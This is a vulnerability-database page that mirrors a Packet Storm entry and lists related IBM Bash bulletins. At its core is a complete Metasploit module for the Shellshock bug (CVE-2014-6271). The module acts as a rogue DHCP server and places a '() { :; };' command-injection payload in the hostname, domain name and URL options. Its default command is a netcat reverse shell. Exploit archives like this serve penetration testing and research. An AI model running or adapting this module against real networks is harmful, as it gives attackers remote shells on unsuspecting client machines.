Lucene search
K

DHCP Client Bash Environment Variable Code Injection

🗓️ 26 Sep 2014 00:00:00Reported by Ramon de C ValleType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 78 Views

DHCP Client Bash Environment Variable Code Injection module exploits code injection in Bash environment variables, targeting dhclient network configuration scripts through DHCP options such as HOSTNAME, DOMAINNAME, and URL.

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
15 Jun 201807:01
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance
17 Jun 201822:30
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
19 Jul 202000:49
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect certain Brocade products that IBM resells for use with IBM BladeCenter (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
31 Jan 201901:35
ibm
IBM Security Bulletins
Security Bulletins for IBM Tealeaf Customer Experience offerings
16 Jun 201819:35
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect certain IBM N Series products (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Jun 201800:08
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
16 Jun 201813:58
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM PureData System for Operational Analytics (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Oct 201903:50
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Flex System Manager (FSM): (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)
31 Jan 201901:30
ibm
IBM Security Bulletins
Security Bulletin: UPDATE: Vulnerabilities in Bash affect AIX Toolbox for Linux Applications (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187)
15 Sep 202112:14
ibm
Rows per page
`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'rex/proto/dhcp'  
  
class Metasploit3 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::DHCPServer  
  
def initialize  
super(  
'Name' => 'DHCP Client Bash Environment Variable Code Injection',  
'Description' => %q{  
This module exploits a code injection in specially crafted environment  
variables in Bash, specifically targeting dhclient network configuration  
scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.  
},  
'Author' =>  
[  
'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module  
'Stephane Chazelas', # Vulnerability discovery  
'Ramon de C Valle' # This module  
],  
'License' => MSF_LICENSE,  
'Actions' =>  
[  
[ 'Service' ]  
],  
'PassiveActions' =>  
[  
'Service'  
],  
'DefaultAction' => 'Service',  
'References' => [  
['CVE', '2014-6271'],  
['CWE', '94'],  
['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],  
['URL', 'http://seclists.org/oss-sec/2014/q3/649',],  
['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]  
],  
'DisclosureDate' => 'Sep 24 2014'  
)  
  
register_options(  
[  
OptString.new('SRVHOST', [ true, 'The IP of the DHCP server' ]),  
OptString.new('NETMASK', [ true, 'The netmask of the local subnet' ]),  
OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),  
OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ]),  
OptString.new('ROUTER', [ false, 'The router IP address' ]),  
OptString.new('BROADCAST', [ false, 'The broadcast address to send to' ]),  
OptString.new('DNSSERVER', [ false, 'The DNS server IP address' ]),  
# OptString.new('HOSTNAME', [ false, 'The optional hostname to assign' ]),  
OptString.new('HOSTSTART', [ false, 'The optional host integer counter' ]),  
OptString.new('FILENAME', [ false, 'The optional filename of a tftp boot server' ]),  
OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])  
], self.class)  
end  
  
def run  
value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"  
  
# This loop is required because the current DHCP Server exits after the  
# first interaction.  
loop do  
begin  
start_service({  
'HOSTNAME' => value,  
'DOMAINNAME' => value,  
'URL' => value  
}.merge(datastore))  
  
while dhcp.thread.alive?  
select(nil, nil, nil, 2)  
end  
  
rescue Interrupt  
break  
  
ensure  
stop_service  
end  
end  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation